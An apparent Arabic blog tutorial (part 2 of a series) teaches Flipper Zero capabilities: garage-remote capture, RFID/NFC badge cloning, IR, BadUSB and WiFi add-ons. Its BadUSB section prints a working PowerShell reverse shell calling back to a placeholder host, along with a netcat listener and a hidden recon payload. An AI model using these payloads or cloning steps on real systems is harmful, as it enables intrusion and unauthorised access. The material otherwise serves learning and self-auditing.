القائمة
نبذة عني الخدمات المسيرة اعمل معي
Circuit board close-up
أمان مارس 6, 2026 • 22 دقائق للقراءة

Flipper Zero Mastery: Every Protocol, Every Trick

Sub-GHz, RFID, NFC, BadUSB, GPIO—master every Flipper Zero capability with hands-on projects. Your work badge is less secure than you think.

شارك:
Lee Foropoulos

Lee Foropoulos

22 دقائق للقراءة

مسار الهاكر: سلسلة من 5 أجزاء

Part 1: IntroductionPart 2: Flipper MasteryPart 3: Kali FundamentalsPart 4: ExploitationPart 5: The Full Audit

في الجزء الأول، بللت قدميك. استنسخت بعض أجهزة التحكم عن بعد بالأشعة تحت الحمراء، ومسحت بعض بطاقات NFC، وشاهدت طيف sub-GHz يضيء، وكتبت "Hello World" باستخدام BadUSB. رأيت أن الأمان غالباً ما يكون وهماً.

الآن ندخل في العمق. بنهاية هذا المقال، ستفهم كل بروتوكول رئيسي يمكن لـ Flipper Zero التفاعل معه، ليس فقط كيفية استخدامها، بل لماذا تعمل بالطريقة التي تعمل بها وماذا يعني ذلك للأمان.

تحذير عادل: ستكتشف أن عدة أشياء افترضت أنها آمنة... ليست كذلك.

فلسفة Flipper

قبل أن نغوص في البروتوكولات، لنؤسس العقلية الصحيحة. Flipper Zero ليس "جهاز اختراق" بالمعنى الهوليوودي. إنه أداة تعلم تتيح لك التفاعل مع ترددات الراديو وبروتوكولات الأجهزة التي عادةً ما تكون غير مرئية.

فكّر فيه كعدسة مكبرة للإشارات اللاسلكية. الإشارات كانت دائماً هناك. فقط لم تكن تستطيع رؤيتها. الآن تستطيع.

هذا التمييز مهم لأنه يغير كيفية تعاملك مع الأمان. معظم "الأمان" يعتمد على الغموض، أي الافتراض بأن المهاجمين لن يعرفوا كيف يتفاعلون مع النظام. Flipper الخاص بك يزيل ذلك الغموض. يُظهر لك بالضبط ما يتم إرساله واستقباله. وبمجرد أن تراه، يمكنك تقييم ما إذا كان الأمان الحقيقي موجوداً.

معظم "الأمان" يعتمد على الغموض، افتراض أن المهاجمين لن يعرفوا كيف يتفاعلون مع النظام. Flipper الخاص بك يزيل ذلك الغموض.

تنبيه: غالباً، لا يوجد أمان حقيقي.

⚠️ تذكير: أجهزتك فقط

كل شيء في هذا المقال هو لاختبار أجهزتك وبطاقاتك وأنظمتك الخاصة. التقنيات تعمل على أجهزة أي شخص، هذا هو الهدف. لكن استخدامها على أنظمة لا تملكها غير قانوني. اختبر أمانك. اكتشف نقاط ضعفك. هذا هو المسار.

Sub-GHz: الطيف غير المرئي

ترددات الراديو تحت الغيغاهرتز في كل مكان. باب المرآب، مفتاح السيارة، محطة الطقس، جرس الباب اللاسلكي، مستشعرات ضغط الإطارات، أجهزة المنزل الذكي، كلها تبث باستمرار في نطاقات تردد أقل من 1 غيغاهرتز.

لماذا sub-GHz؟ الترددات المنخفضة تسافر أبعد وتخترق الجدران أفضل من الترددات العالية مثل WiFi (2.4/5 غيغاهرتز). هذا يجعلها مثالية للأجهزة التي تحتاج اتصالاً موثوقاً عبر المسافة دون متطلبات خط البصر.

مشهد الترددات

مناطق مختلفة تستخدم ترددات مختلفة بسبب التنظيمات:

  • 315 MHz: أمريكا الشمالية، أبواب المرآب القديمة، مفاتيح السيارات
  • 390 MHz: أمريكا الشمالية، أبواب المرآب، بعض السيارات
  • 433.92 MHz: عالمياً، محطات الطقس، المستشعرات، الأجهزة الأوروبية، العديد من منتجات IoT
  • 868 MHz: أوروبا، المنزل الذكي، LoRa، عدادات المرافق
  • 915 MHz: الأمريكتان، LoRa، المنزل الذكي، الصناعة

مع برنامج Momentum الثابت، يمكن لـ Flipper الإرسال والاستقبال عبر كل هذه النطاقات بغض النظر عن موقعك الفعلي. البرنامج الثابت الأصلي يقيدك بالترددات القانونية في منطقتك. هذا مهم للتعلم، فقد تكون لديك أجهزة تعمل على ترددات "أجنبية".

مشروع: حلل باب المرآب

الوقت: 15 دقيقة

ما ستتعلمه: الفرق بين الرموز الثابتة والرموز المتغيرة، ولماذا هذا مهم

الخطوات:

  1. انتقل إلى Sub-GHz → Read
  2. قف بالقرب من المرآب (ليس قريباً جداً حتى يفتح الباب)
  3. اضغط على زر جهاز التحكم في باب المرآب
  4. شاهد Flipper يلتقط الإشارة
  5. افحص ما تم التقاطه، انظر إلى البروتوكول المحدد

ما قد تراه:

  • Princeton, Linear, Chamberlain (قديم): رموز ثابتة. نفس الرمز يُرسل في كل مرة. عرضة لهجمات الإعادة.
  • KeeLoq, Security+ 2.0, Rolling Code: رموز متغيرة. كل إرسال يستخدم رمزاً مختلفاً من تسلسل متزامن. لا يمكن إعادته ببساطة.

الواقع: إذا كان باب المرآب يستخدم رمزاً ثابتاً (كثير من المثبتة قبل ~2015 تفعل ذلك)، فأي شخص يلتقط تلك الإشارة مرة واحدة يمكنه إعادتها للأبد. مرآبك مؤمن بافتراض أن لا أحد يستمع. ذلك الافتراض انكسر للتو.

شرح الرموز المتغيرة

أبواب المرآب الحديثة ومفاتيح السيارات تستخدم الرموز المتغيرة (تسمى أيضاً رموز القفز). إليك كيف تعمل:

  1. المرسل (جهاز التحكم) والمستقبل (المرآب) يتشاركان بذرة سرية وخوارزمية
  2. كل ضغطة زر تولد الرمز التالي في تسلسل متزامن
  3. المستقبل يقبل الرمز الحالي أو أي من الرموز الـ 256 التالية (للتعامل مع الضغطات خارج النطاق)
  4. بمجرد استخدام الرمز، يُبطل للأبد

هذا يعني أن التقاط وإعادة إشارة الرمز المتغير لا يعمل. بحلول الوقت الذي تعيدها، يكون الرمز قد أُبطل بالفعل.

لماذا هذا مهم

الرموز المتغيرة اخترعت لأن عالم sub-GHz اكتشف أن الأمان عبر الغموض يفشل. شخص ما اكتشف كيف يلتقط ويعيد الإشارات، فاضطرت الصناعة لتطبيق أمان تشفيري حقيقي. هذا النمط يتكرر عبر كل بروتوكول سنناقشه: الأمان يُضاف فقط بعد أن يُثبت شخص ما الثغرة.

مشروع: التقاط بيانات محطة الطقس

الوقت: 10 دقائق

ما ستتعلمه: كم من البيانات تُبث بدون أي حماية

الخطوات:

  1. انتقل إلى Sub-GHz → Read
  2. انتظر بالقرب من أي مستشعر طقس لاسلكي (ميزان حرارة خارجي، مقياس أمطار، إلخ)
  3. معظمها يبث كل 30-60 ثانية
  4. التقط الإرسال
  5. لاحظ البروتوكول وأي بيانات مفكوكة التشفير

ما ستجده: درجة الحرارة، الرطوبة، حالة البطارية، معرف المستشعر، كلها تُرسل بنص صريح. لا تشفير، لا مصادقة. أي مستقبل مضبوط على ذلك التردد يحصل على كل البيانات. الآن فكّر فيما يبث أيضاً في حيك...

مفهوم موجات الراديو
طيف الراديو من حولك نشط باستمرار بإرسالات غير مشفرة

RFID: عالم 125kHz

تقنية RFID منخفضة التردد (125kHz) هي تقنية بطاقات القرب الأقدم والأبسط. ستجدها في بطاقات عضوية النادي الرياضي، وبطاقات الدخول لمباني المكاتب القديمة، ومواقف السيارات، وأنظمة دخول المباني السكنية.

وهي فظيعة للأمان بشكل شبه عالمي.

كيف يعمل RFID بتردد 125kHz

هذه البطاقات سلبية، ليس بها بطارية. عندما تضعها قرب قارئ، يوفر المجال الكهرومغناطيسي للقارئ الطاقة للبطاقة، وتُرسل البطاقة رقم معرفها. هذا كل شيء. لا تحدي واستجابة. لا تشفير. فقط: "أنا البطاقة رقم 12345."

القارئ يقول "حسناً" ويمنح الوصول بناءً فقط على معرفة رقم المعرف ذاك.

أترى المشكلة.

أنواع بطاقات 125kHz الشائعة

  • EM4100: شائعة للغاية. تبث فقط معرف 40-بت. أمان صفري.
  • HID Prox: أكثر بطاقات الدخول المؤسسية شيوعاً. تبث كود المنشأة + رقم البطاقة. أمان صفري.
  • Indala: أقل شيوعاً. ترميز مختلف لكن نفس المشكلة، لا أمان.
  • AWID: نوع آخر. نفس الضعف الأساسي.

لاحظ النمط؟ كل هذه البطاقات تبث ببساطة معرفاً. "الأمان" هو أن شخصاً ما سيحتاج معدات متخصصة لقراءة ذلك المعرف. Flipper الخاص بك هو تلك المعدات.

مشروع: استنسخ بطاقة النادي الرياضي

الوقت: 5 دقائق

ما تحتاجه: بطاقة النادي/المسبح/الشقة بتردد 125kHz، بطاقة فارغة T5577 ($1-2 لكل واحدة)

الخطوات:

  1. انتقل إلى 125 kHz RFID → Read
  2. ضع بطاقتك على ظهر Flipper (حيث هوائي RFID)
  3. انتظر القراءة الناجحة، لاحظ نوع البطاقة والمعرف
  4. احفظ البطاقة باسم يمكن التعرف عليه
  5. لاختبار المحاكاة: Saved → Select Card → Emulate
  6. ضع Flipper على قارئ النادي، يجب أن يعمل بشكل مطابق لبطاقتك

للكتابة على بطاقة T5577 فارغة:

  1. اذهب إلى بطاقتك المحفوظة
  2. اختر Write
  3. ضع بطاقة T5577 فارغة على Flipper
  4. انتظر تأكيد الكتابة
  5. الآن لديك نسخة مادية

لماذا هذا مهم: نموذج الأمان الكامل لنظام التحكم في الوصول ذاك انهار للتو. أي شخص يمكنه الاقتراب من بطاقتك لثانيتين يمكنه استنساخها. فكر في ذلك المرة القادمة التي تترك فيها حقيبة النادي دون مراقبة في غرفة الخزائن.

T5577: بطاقتك السحرية

T5577 هي بطاقة RFID قابلة لإعادة الكتابة يمكنها محاكاة معظم أنواع بطاقات 125kHz. إنها مثل CD-R فارغ لبطاقات الوصول. يمكنك كتابة أي بيانات بطاقة عليها، وتصبح تلك البطاقة.

اشترِ حزمة من 10 للاختبار. رخيصة ومفيدة بشكل لا يصدق لفهم مدى ضعف هذه التقنية بأكملها. يمكنك كتابة بيانات بطاقة واحدة، واختبارها، ثم كتابة بيانات بطاقة مختلفة، كلها على نفس البطاقة الفيزيائية.

ما يكشفه هذا

"أمان" RFID بتردد 125kHz هو مسرح محض. هذه الأنظمة تفترض أنك لا تستطيع قراءة البطاقة، ولا نسخ البيانات، ولا كتابتها على بطاقة أخرى. كل الافتراضات الثلاثة خاطئة مع معدات المستهلك. إذا كان مكان عملك يستخدم بطاقات HID Prox (أكثر بطاقات الدخول المؤسسية شيوعاً)، فأي موظف لديه Flipper يمكنه استنساخ وصول أي موظف آخر. دع ذلك يتسرب.

النقطة الرئيسية

أمان RFID بتردد 125kHz هو مسرح محض. هذه الأنظمة تفترض أنك لا تستطيع قراءة أو نسخ أو إعادة كتابة بيانات البطاقة. كل الافتراضات الثلاثة خاطئة مع معدات المستهلك التي تكلف أقل من 200 دولار.

لقطة مقربة لوحة دارات مع مكونات إلكترونية
كل بروتوكول لاسلكي يلمسه Flipper يكشف افتراضات حول الأمان نادراً ما تصمد أمام التدقيق

NFC: عالم 13.56MHz

NFC عالي التردد (13.56 MHz) هو الجيل الأحدث. يشغّل الدفع بدون تلامس، وبطاقات الوصول الحديثة، وأنظمة النقل، ومفاتيح الفنادق، وميزة الدفع بالنقر في هاتفك.

الخبر الجيد: بعض بطاقات NFC لديها أمان حقيقي فعلاً.

الخبر السيء: كثير منها ليس كذلك.

أنواع بطاقات NFC

  • MIFARE Classic: شائعة للغاية في بطاقات الوصول والنقل والفنادق. تستخدم تشفيراً خاصاً تم كسره منذ سنوات. ضعيفة.
  • MIFARE Ultralight: بطاقات بسيطة بأمان ضئيل. تُستخدم غالباً لتذاكر النقل القابلة للتخلص.
  • NTAG: شائعة في وسوم NFC للأتمتة. عادةً أمان ضئيل.
  • MIFARE DESFire: آمنة فعلاً. تستخدم تشفير AES. تُستخدم في عمليات النشر عالية الأمان الأحدث.
  • EMV (بطاقات الدفع): بطاقتك الائتمانية. لديها تشفير قوي وحدود معاملات وكشف احتيال.

مشروع: حلل بطاقة العمل

الوقت: 10 دقائق

ما ستتعلمه: هل مكان عملك لديه أمان حقيقي أم مسرح أمني

الخطوات:

  1. انتقل إلى NFC → Read
  2. ضع بطاقة العمل على ظهر Flipper
  3. انتظر اكتمال القراءة
  4. افحص ما يخبرك به Flipper

تفسير النتائج:

  • MIFARE Classic 1K/4K: بطاقتك تستخدم تشفيراً مكسوراً. بالوقت والأدوات الصحيحة، يمكن استنساخها.
  • MIFARE Ultralight: أمان ضئيل. غالباً قابلة للاستنساخ.
  • MIFARE DESFire: آمنة فعلاً. سترى بيانات محدودة.
  • Unknown/Locked: قد تكون خاصة أو DESFire. تحتاج مزيداً من التحقيق.
18 years
Since MIFARE Classic encryption was publicly broken in 2008, yet most corporate badges still rely on it.

فحص الواقع: معظم بطاقات الشركات ما زالت MIFARE Classic. التشفير كُسر علنياً في 2008. قبل ثمانية عشر عاماً. إذا كانت بطاقتك تقول MIFARE Classic، فصاحب عملك يشغّل نظام أمان يعتبره خبراء التشفير مكسوراً بشكل مضحك.

استنساخ UID مقابل الاستنساخ الكامل

تمييز مهم: يمكن لـ Flipper دائماً قراءة ومحاكاة UID للبطاقة (المعرف الفريد)، أي الرقم التسلسلي. بعض أنظمة الوصول تتحقق فقط من UID. لهذه الأنظمة، المحاكاة البسيطة تعمل.

الأنظمة الأفضل تتحقق من UID والبيانات المشفرة المخزنة على البطاقة معاً. لهذه، ستحتاج أيضاً لاستنساخ القطاعات المشفرة، ممكن لـ MIFARE Classic (التشفير مكسور) لكن ليس لـ DESFire.

مشروع: تحليل بطاقة مفتاح الفندق

الوقت: 5 دقائق (المرة القادمة التي تكون فيها في فندق)

ما ستتعلمه: كيف يعمل أمان الفندق فعلاً

الخطوات:

  1. اقرأ بطاقة مفتاح الفندق بـ NFC → Read
  2. لاحظ نوع البطاقة
  3. انظر ما هي البيانات القابلة للقراءة

ما ستجده عادةً: معظم مفاتيح الفنادق هي MIFARE Ultralight أو Classic. بعضها يُظهر رقم الغرفة أو تاريخ المغادرة أو بيانات وصفية أخرى في قطاعات قابلة للقراءة. "الأمان" هو أن النزلاء عادةً ليس لديهم قارئات NFC. أنت الآن لديك.

البطاقات السحرية لـ NFC

مثل T5577 لتردد 125kHz، هناك بطاقات NFC "سحرية" لتردد 13.56MHz:

  • Gen1 (UID Changeable): يمكن كتابة UID مخصص. تكتشفها بعض القارئات كـ"سحرية."
  • Gen2 (CUID): توافق أفضل. تغييرات UID تبقى بعد دورات الطاقة.
  • Gen3 (UFUID): يمكن قفل UID بعد الكتابة، تظهر كبطاقة عادية.
  • Gen4 (Ultimate Magic): الأكثر مرونة. يمكنها محاكاة أنواع بطاقات متعددة.

للتعلم، بطاقات Gen2 هي النقطة المثالية: رخيصة، متوافقة على نطاق واسع، وكافية لمعظم الاختبارات.

الأشعة تحت الحمراء: تحكم كامل

أنشأت بالفعل أجهزة تحكم IR في الجزء الأول. لنتعمق أكثر.

بناء مكتبة التحكم عن بعد المطلقة

يمكن لـ Flipper تخزين عدد غير محدود من أجهزة التحكم IR. لكن تعلم كل زر على حدة ممل. طريقة أفضل: استخدم قواعد بيانات المجتمع.

برنامج Momentum الثابت يتضمن IRDB، قاعدة بيانات ضخمة من أجهزة التحكم المسجلة مسبقاً. يمكنك أيضاً تحميل أجهزة تحكم من مستودعات GitHub وإضافتها إلى بطاقة SD لـ Flipper.

مشروع: ابنِ ترسانة IR

الوقت: 20 دقيقة

الخطوات:

  1. على Flipper: Infrared → Universal Remotes
  2. ستجد أجهزة تحكم عامة جاهزة للتلفزيونات ومكيفات الهواء وأجهزة العرض، إلخ.
  3. اختبرها على أجهزتك
  4. للأجهزة غير المشمولة، استخدم Learn New Remote
  5. نظّم أجهزة التحكم المحفوظة حسب الغرفة أو نوع الجهاز

حركة قوية: أنشئ "أجهزة تحكم للغرفة" تجمع كل أجهزة IR في مكان واحد. ملف واحد يتحكم في التلفزيون ومكبر الصوت والأضواء والمكيف.

ما تتعلمه: IR عالمي وغير محمي. أي جهاز بمستقبل IR يمكن التحكم فيه بأي جهاز بمرسل IR. هذا مقصود. IR صُمم للراحة، لا الأمان. Flipper فقط يجعل تلك الراحة عالمية.

التقاط IR الخام

بعض الأجهزة تستخدم بروتوكولات IR غير قياسية. لهذه، يمكن لـ Flipper التقاط الإشارة الخام، أي التوقيت الدقيق لنبضات التشغيل/الإيقاف، وإعادتها بشكل مثالي.

انتقل إلى Infrared → Learn New → Raw عندما لا يتعرف التعلم القياسي على إشارة.

BadUSB: بديل Rubber Ducky

في الجزء الأول، جعلت Flipper يكتب "Hello World." الآن نجدّ.

BadUSB (المعروف أيضاً بهجمات USB Rubber Ducky) يستغل عيباً أساسياً في كيفية تعامل الحواسيب مع أجهزة USB: تثق بلوحات المفاتيح بشكل ضمني. عندما توصل جهازاً يدّعي أنه لوحة مفاتيح، يقبل الحاسوب كل ضغطة مفتاح دون سؤال.

يمكن لـ Flipper كتابة حوالي 1,000 حرف في الثانية. أسرع من أي إنسان. سريع بما يكفي لتنفيذ هجمات معقدة قبل أن يتمكن أي شخص من الاستجابة.

أساسيات DuckyScript

حمولات BadUSB تستخدم DuckyScript، لغة برمجة بسيطة. الأوامر الرئيسية:

REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPE

مشروع: جامع معلومات النظام

الوقت: 15 دقيقة

ما يفعله: يفتح PowerShell، يجمع معلومات النظام، ويحفظها في ملف (على جهازك أنت)

REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTER

ما تتعلمه: في أقل من 3 ثوانٍ من الوصول الفيزيائي، يمكن للمهاجم جمع اسم المضيف واسم المستخدم والنطاق وعناوين IP وإصدار نظام التشغيل. هذا استطلاع. تخيل ما يمكن كتابته أيضاً في تلك الثواني الثلاث.

مشروع: إعداد الشل العكسي

الوقت: 30 دقيقة (بما في ذلك إعداد Kali)

ما يفعله: ينشئ اتصالاً يعود إلى جهاز Kali الخاص بك (تحضيراً للجزء 3)

المتطلبات المسبقة: Kali Linux يعمل (VM مقبول)، اعرف عنوان IP لجهاز Kali

على Kali، ابدأ المستمع:

nc -lvnp 4444

حمولة BadUSB (هدف Windows):

REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER

ما يحدث: الجهاز المستهدف يفتح اتصال PowerShell يعود إلى جهاز Kali الخاص بك. الآن لديك وصول سطر أوامر لذلك الجهاز. هذا جوهر كيف يمكن للوصول الفيزيائي + BadUSB = اختراق كامل. سنستكشف هذا أكثر في الجزء 3.

⚠️ هذه الحمولات حقيقية

حمولة الشل العكسي أعلاه تعمل فعلاً. استخدمها فقط على أجهزة تملكها للاختبار. تشغيلها على جهاز شخص آخر هو جريمة فيدرالية (وصول غير مصرح به + تثبيت باب خلفي). الهدف هو فهم التهديد، لا خلقه.

حمولات ممتعة للعروض التوضيحية

لعرض BadUSB للآخرين (على أجهزتهم بإذن)، إليك بعض الحمولات غير الضارة لكن المثيرة:

REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER
REM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11
REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROW

GPIO: توسيع الأجهزة

دبابيس GPIO (المدخلات/المخرجات العامة الغرض) لـ Flipper تتيح لك توصيل وحدات خارجية وتوسيع القدرات. هنا يتحول Flipper من أداة محمولة إلى منصة تطوير.

الوحدات الضرورية

  • WiFi Dev Board: تضيف قدرات WiFi، التقاط الحزم، اختبار إلغاء المصادقة، هجمات التوأم الشرير. ضرورية للجزء 3 فصاعداً.
  • CC1101 External Antenna: تمدد نطاق Sub-GHz بشكل كبير. الهوائي الداخلي يعمل، لكن الخارجي أفضل للعمل الجاد.
  • ESP32 Marauder: يحوّل Flipper إلى منصة اختراق WiFi/Bluetooth. يلتقط المصافحات، يشغّل الهجمات.
  • ProtoBoard: للمشاريع المخصصة وتوصيل أجهزتك الخاصة.

مشروع: إعداد WiFi Dev Board

الوقت: 20 دقيقة

ما تحتاجه: WiFi Dev Board (رسمية أو ESP32 متوافقة)

الخطوات:

  1. فلاش برنامج Marauder الثابت على ESP32 (التعليمات في github.com/justcallmekoko/ESP32Marauder)
  2. وصّلها بدبابيس GPIO لـ Flipper
  3. انتقل إلى GPIO → ESP32 → Marauder
  4. الآن لديك مسح WiFi وإلغاء مصادقة والتقاط حزم

لماذا هذا مهم: Flipper وحده لا يستطيع التعامل مع WiFi، ينقصه أجهزة الراديو المناسبة. لكن مع لوحة التطوير، يمكنك مسح الشبكات والتقاط مصافحات WPA وتنفيذ هجمات WiFi. سنستخدم هذا بشكل مكثف في الأجزاء 3 و4.

ميزات Momentum المتقدمة

إذا كنت تشغّل برنامج Momentum الثابت (يجب أن تفعل)، إليك ميزات تستحق الاستكشاف:

  • Desktop Animations: تجميلية بحتة، لكنها ممتعة. تحقق من حزم الرسوم المتحركة المجتمعية.
  • Extended Protocols: Momentum يضيف دعماً لبروتوكولات لا يتضمنها البرنامج الثابت الأصلي.
  • Application Hub: تطبيقات إضافية تتجاوز الأصلي، ألعاب وأدوات ومرافق متخصصة.
  • Custom Asset Packs: غيّر المظهر والإحساس بالكامل.

القيمة الحقيقية في الترددات المفتوحة ودعم البروتوكولات الموسع. البرنامج الثابت الأصلي محدود عمداً للامتثال القانوني/التنظيمي. Momentum يفترض أنك بالغ يفهم القواعد.

ما أتقنته

أنت الآن تفهم:

  • Sub-GHz: كيف تتواصل أبواب المرآب ومفاتيح السيارات والمستشعرات، ولماذا الرموز المتغيرة مهمة
  • 125kHz RFID: لماذا بطاقات النادي وبطاقات الوصول القديمة يمكن استنساخها بسهولة
  • 13.56MHz NFC: الفرق بين التشفير المكسور (MIFARE Classic) والأمان الحقيقي (DESFire)
  • الأشعة تحت الحمراء: كيف تبني مكتبة تحكم عن بعد عالمية وتلتقط الإشارات الخام
  • BadUSB: لماذا ثقة USB HID هي ثغرة أساسية، وكيف تستغلها
  • GPIO: كيف تتوسع إلى WiFi والنطاق الممتد والأجهزة المخصصة

Flipper الخاص بك الآن سلاح. لكنه مفك براغي مقارنة بـ Kali Linux، التي هي ورشة عمل كاملة. حان الوقت لتشغيل بيئة الاختراق الحقيقية.

مسار الهاكر

سلسلة من 5 أجزاء تأخذك من فضولي إلى قادر.

Part 1: Introduction Part 2: Flipper Mastery ✓ Part 3: Kali Fundamentals Part 4: Exploitation Part 5: Full Audit

قائمة التحقق للجزء 2

☐ Sub-GHz: تم تحليل باب المرآب، فُهمت الرموز المتغيرة مقابل الثابتة

☐ 125kHz RFID: قُرئت البطاقات، اختُبر استنساخ واحد على الأقل

☐ NFC: حُلل بطاقة العمل، حُدد نوع البطاقة

☐ الأشعة تحت الحمراء: بُنيت مكتبة تحكم منزلية كاملة

☐ BadUSB: اختُبرت حمولة معلومات النظام، فُهم الشل العكسي

☐ GPIO: لوحة WiFi Dev جاهزة للجزء 3

☐ البطاقات السحرية: حُصل على بطاقات T5577 و/أو NFC سحرية للاختبار

خطة عمل إتقان Flipper 0/6

ما التالي

في الجزء 3، نترك قدرات Flipper المركزة وندخل بيئة اختبار الاختراق الكاملة: Kali Linux.

ستتعلم:

  • إعداد مختبر الاختراق الخاص بك (تثبيت وتكوين VM)
  • استطلاع الشبكة باستخدام nmap، رسم خريطة لكل جهاز على شبكتك
  • الاستطلاع اللاسلكي، التقاط مصافحات WiFi باستخدام aircrack-ng
  • استطلاع الويب، اكتشاف ما يكشفه جهاز التوجيه الخاص بك
  • ربط التقاطات Flipper بسير عمل Kali

Flipper أظهر لك أن الثغرات موجودة. Kali يساعدك على فهم مدى عمقها بالضبط.

نراكم في الجزء 3.

How was this article?

شارك

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

La tufawwit ay maqal

Ihsal ala isharat inda nashr maqalat jadida. La yulzam barid iliktiruni.

Satara laafita fil mawqi inda wujud maqal jadid, wa ishaar min almutasaffih idha samahta.

Isharat almutasaffih faqat. Bidun rasail muzaaja.